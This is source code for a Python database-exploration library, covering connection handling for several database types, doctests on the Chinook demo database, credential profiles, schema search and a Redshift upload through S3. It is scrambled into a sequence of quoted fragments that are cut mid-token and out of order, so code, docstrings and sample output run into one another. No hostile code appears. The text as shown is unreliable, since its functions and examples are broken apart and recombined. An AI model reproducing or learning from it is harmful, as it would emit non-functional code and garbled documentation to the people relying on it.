2 2 3 Fast As a Shark 3 2 3 4", "db.query(q, limit=10) Title \\ 0 For Those About To Rock We Salute You", "Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook =", "11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select", "be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create the", "Exception(\"Database type not specified! 
Must select one of: postgres, sqlite, mysql, mssql, or", "the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>,", "dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port =", "self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def", "... {{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\",", "db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the", "\"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist", "| | Track | GenreId | INTEGER | | Track | Bytes |", "| Column Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120)", "tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name,", "def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for a", "For Those About To Rock We Salute You 6 For Those About To", "dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\",", "<NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider &", "import DemoDB >>> db = DemoDB() >>> q = ''' ... 
SELECT ...", "as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+", "def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key", "database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is", "0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ...", "2 2 2 3 Fast As a Shark 3 2 3 4 Restless", "None means that you'll have verrrrrrrry wide columns in some cases. driver: str,", "hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>>", "Balls to the Wall 2 2 2 3 Fast As a Shark 3", "1 1 6 7 Let's Get It Up 1 1 7 8 Inject", "varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer", "return q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your", "varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name,", "in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {}", "'ref_keys')} # col metadata: format as list of tuples, to match how normal", "dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur", "foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name 
varchar, column_name", "DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db =", "returns everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search):", "is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str =", "| NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\")", "HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo", "pass else: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite,", "Track | AlbumId | INTEGER | | Track | MediaTypeId | INTEGER |", "for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection", "pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL", "None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure", "environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on", "About To Rock We Salute You 7 For Those About To Rock We", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. 
the s3", "self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query", "returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all", "there's always a random issue where rows are not in the same order,", "looking for data_type: str, list (optional) specify which data type(s) you want to", "NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType | Name", "<NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>,", "self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize", "else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile", "SQL script data: list, dict Optional argument for handlebars-queries. Data will be passed", "your database (i.e. \"dw\", \"prod\") from db import DB import pymysql db =", "= TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def", "already exists chunk_size: int (10000) Number of DataFrame chunks to upload and COPY", "profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name}", "password for the database hostname: str Hostname your database is running on (i.e.", "or by passing an argument to `DB()`. None indicates that there will be", "way for all those doctests to be viable... -= if not, there's always", "8 6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT ...", "and Wild 2 3 4 Let There Be Rock 1 4 5 Big", "len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all those", "control the rendering of PrettyTable a bit. 
None means that you'll have verrrrrrrry", "all those doctests to be viable... -= if not, there's always a random", "1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>,", "if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache:", "as pg HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb", "of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or", "query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else:", "Salute You) 1 1 1 2 Balls to the Wall 2 2 <BLANKLINE>", "2 Balls to the Wall 2 2 3 Restless and Wild 2 3", "As a Shark 3 2 3 4 Restless and Wild 3 2 4", "This should match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise", "data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return", "self.cur: # second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db'])", "... on a.AlbumId = t.AlbumId; ... 
''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title", ".query_templates import query_templates # attempt to import the relevant database libraries # TODO:", "375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926", "if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data,", "[data_type] cols = [] for table in self.tables: for col in vars(table): if", "MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute You) 1", "5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451", "| InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER", "DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info.", "from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID", "(\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name,", "is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices", "if this is None, the function will try and grab AWS_SECRET_KEY from your", "Optional argument for handlebars-queries. Data will be passed to the template and rendered", "can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name", "u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>,", "identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if", "| NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") #", "here. the s3 argument is a prefix, so it'll pick up # all", "self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. 
Please ensure it is", "| | Invoice | CustomerId | INTEGER | | Invoice | BillingAddress |", "col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column):", "with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\",", "| BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing", "Exception(\"Sorry, feature only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key", "20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17", "else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials", "230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy &", "as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is", "ArtistId | INTEGER | | Customer | SupportRepId | INTEGER | | Customer", "in a query. This is used by the DB.query method. You can override", "containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables = []", "not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't", "| INTEGER | | MediaType | MediaTypeId | INTEGER | | Track |", "---------- username: str Your username for the database password: str Your password for", "to say this a secure way to store sensitive data, but it will", "results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results =", "aws secrety key. 
if this is None, the function will try and grab", "sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if", "list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas])", "by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password':", "where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists", "\"\"\" Pulls your database's schema again and looks for any new tables and", "~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not to say", "else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list)", "to store sensitive data, but it will probably stop your little sister from", "is None, the function will try and grab AWS_ACCESS_KEY from your environment variables", "pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying data from", "of tuples if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading", "= self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. 
load directly from", "import pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as", "= True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find", "Balls to the Wall 2 2 3 Restless and Wild 2 3 4", "for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query =", "\"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\"", "+----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are", "Key from boto.s3.connection import Location # if boto is present, set the bucket_location", "= ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) )", "for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table", "str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB", "import Column, ColumnSet from .table import Table, TableSet from .s3 import S3 from", ">>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId,", "= self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find", "specified! 
Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates =", "| InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER", "| Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+", "q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template =", "| | Employee | ReportsTo | INTEGER | | Employee | EmployeeId |", "6 Put The Finger On You 1 1 6 7 Let's Get It", "Those About To Rock (We Salute You) 0.99 1 Balls to the Wall", "in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for", "{} # generate our Columns, and attach to each table to the table", "to match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'],", "row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name,", "('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to", "data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e:", "Rock 1 4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q,", "schema again and looks for any new tables and columns. \"\"\" col_meta, table_meta", "use the naive approach if use_cache: # generate our Tables, and load them", "print_sql: bool (False) option for printing sql statement that will be executed bucket_location:", "S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database.", "DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... 
t.UnitPrice", "hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self,", "dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not in tables:", "len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict", "columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type |", "use_cache): col_meta = [] table_meta = {} # pull out column metadata for", "None, the function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY:", "database dbname: str Name of the database schemas: list List of schemas to", "self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit,", "of keys to display in the foreign and reference keys. This is used", "Get It Up 1 1 7 8 Inject The Venom 1 1 8", "ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\",", "tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try:", "key. if this is None, the function will try and grab AWS_ACCESS_KEY from", "into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where", "Parameters ---------- q: str Query string to execute data: list, dict Optional argument", "Upload a dataframe to redshift via s3. Parameters ---------- name: str name for", "for data_type: str, list (optional) specify which data type(s) you want to return", "add warnings? 
try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG", "hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables", "None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None:", "= multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if running", "raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\"", "tuples if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached", "profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the", "Table | Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId |", "StringIO import StringIO # Python 2.7 except: from io import StringIO # Python", "generate our Columns, and attach to each table to the table name in", "1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel,", "use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])", "that fit into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing", "for t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it", "... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name cnt", "the Dawn 3 2 5 6 Put The Finger On You 1 1", "is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an", "s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY", "Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\")", "| MediaType | Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120)", "sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one time, database-wide,", "don't need this, but if you're a db admin you might actually want", "hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname,", "containing Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ |", "more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook,", "hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db", "a table. Parameters ----------- search: str glob pattern for what you're looking for", "might actually want to query the system tables. limit: int, None Default number", "transfer s3 bucket. This should match your redshift cluster's region. 
Examples -------- \"\"\"", "if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if", "\"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str)", "DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def", "To Rock We Salute You 6 For Those About To Rock We Salute", "We Salute You 1 1 2 Balls to the Wall 2 2 3", "| INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine |", "Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger On", "ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or", "+ chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False,", "of the database profiles available Examples -------- No doctest, covered by unittest list_profiles()", "the rendering of PrettyTable a bit. None means that you'll have verrrrrrrry wide", "= hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype =", "key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database", "conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can", "set the bucket_location to default. 
# we can't do this in the function", "tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache:", "exclude_system_tables: bool Whether or not to include \"system\" tables (the ones that the", "metadata: format as list of tuples, to match how normal loading is performed", "dbtype self.schemas = schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver", "if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict):", "| Customer | CustomerId | INTEGER | | Employee | ReportsTo | INTEGER", "returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type", "Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type =", "{{ name }} ... GROUP BY ... table_name ... ''' >>> data =", "for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}',", "take a second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select", "exists chunk_size: int (10000) Number of DataFrame chunks to upload and COPY from", "self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur =", "\"\"\" Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and", "schema for a table. Parameters ----------- search: str glob pattern for what you're", "for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename:", "5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9", "getting all key relationships # 3. 
use the naive approach if use_cache: #", "# generate schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df,", "5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7", "k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py')", "str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port", "t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those", "sqlite database dbname: str Name of the database schemas: list List of schemas", "pg HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect", "Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99", "\"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for redshift sql", "upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key =", "bit. None means that you'll have verrrrrrrry wide columns in some cases. 
driver:", "For Those About To Rock We Salute You 1 Balls to the Wall", "into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])", "profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config", "of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not", "StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads", "this, but if you're a db admin you might actually want to query", "self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL", "= '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname)", "q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for", "name }} ... GROUP BY ... table_name ... ''' >>> data = [", "NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ |", "= DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name, ...", "About To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99", "sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\")", "a random issue where rows are not in the same order, making doctest", "database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return {", "R.A. 
Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>,", "base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con =", "= range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)]", "or not \"UNION ALL\" handlebars templates. This will return any handlebars queries as", "Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\")", "| INTEGER | | Track | Milliseconds | INTEGER | | Track |", "includes things like schema definitions. Most of you probably don't need this, but", "handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. This will return", "self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library.", "| PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER | |", "Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562", "executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df,", "postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\":", "foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False):", "8 9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer", "plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\"", "{1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an 
instance of DB that hooks", "6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424", "into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns'])", "s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY", "self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials", "| PlaylistId | INTEGER | | Track | TrackId | INTEGER | |", "Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\",", "load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the", "Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing", "For Those About To Rock We Salute You Name UnitPrice 0 For Those", "Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in", "'<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out,", "for a table. 
